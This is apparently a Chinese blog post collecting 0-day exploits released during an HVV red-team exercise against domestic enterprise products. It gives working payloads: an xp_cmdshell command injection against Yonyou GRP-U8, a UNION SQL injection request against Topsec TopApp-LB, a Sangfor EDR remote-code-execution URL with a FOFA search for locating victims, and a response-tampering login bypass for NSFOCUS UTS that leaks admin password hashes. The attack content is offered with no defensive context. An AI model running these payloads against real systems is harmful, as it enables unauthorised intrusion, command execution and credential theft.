护网行动部分0day [总结]

前言

HVV第一天部分0day消息
今天早上9点正式开始的HVV目前0day满天飞

  1. 用友GRP-u8注入 EXP已公开
  2. 天融信TopApp-LB 负载均衡系统sq1注入 EXP已公开
  3.  sangfor EDR RCE漏洞 EXP已公开
  4. 绿盟UTS绕过登录 EXP已公开
  5. 绿盟UTS未授权访问EXP 半公开
  6. WPS的0day中招据说会提示更新 EXP未公开
  7. 奇治堡垒机的利用 EXP未公开
  8. 联软准入的利用 EXP未公开

用友GRP-u8注入


POST /Proxy HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache


cVer=9.8.0&dp=XMLAS_DataRequestProviderNameDataSetProviderDataDataexec xp_cmdshell 'ipconfig'
 

天融信TopApp-LB 负载均衡系统 SQL注入


POST /acc/clsf/report/datasource.php HTTP/1.1
Host: x.x.x.x
Connection: close
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57
Content-Type: application/x-www-form-urlencoded
Content-Length: 201
 
t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。

 sangfor EDR RCE漏洞

第一步:通过fofa搜索语法title="终端检测响应平台"可以找到一大批使用该系统的站点。

第二步:随缘点击进去一个来到主界面,也就是这个样子。

第三步:构造payload,这里漏洞文件是c.php,漏洞参数是host

/tool/log/c.php?strip_slashes=system&host=id

反弹shell。

绿盟UTS综合威胁探针 管理员任意登录



对响应包进行修改,将false更改为true

可以获得泄露的管理用户md5值密码

利用md5值去登录页面

效果如下

点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注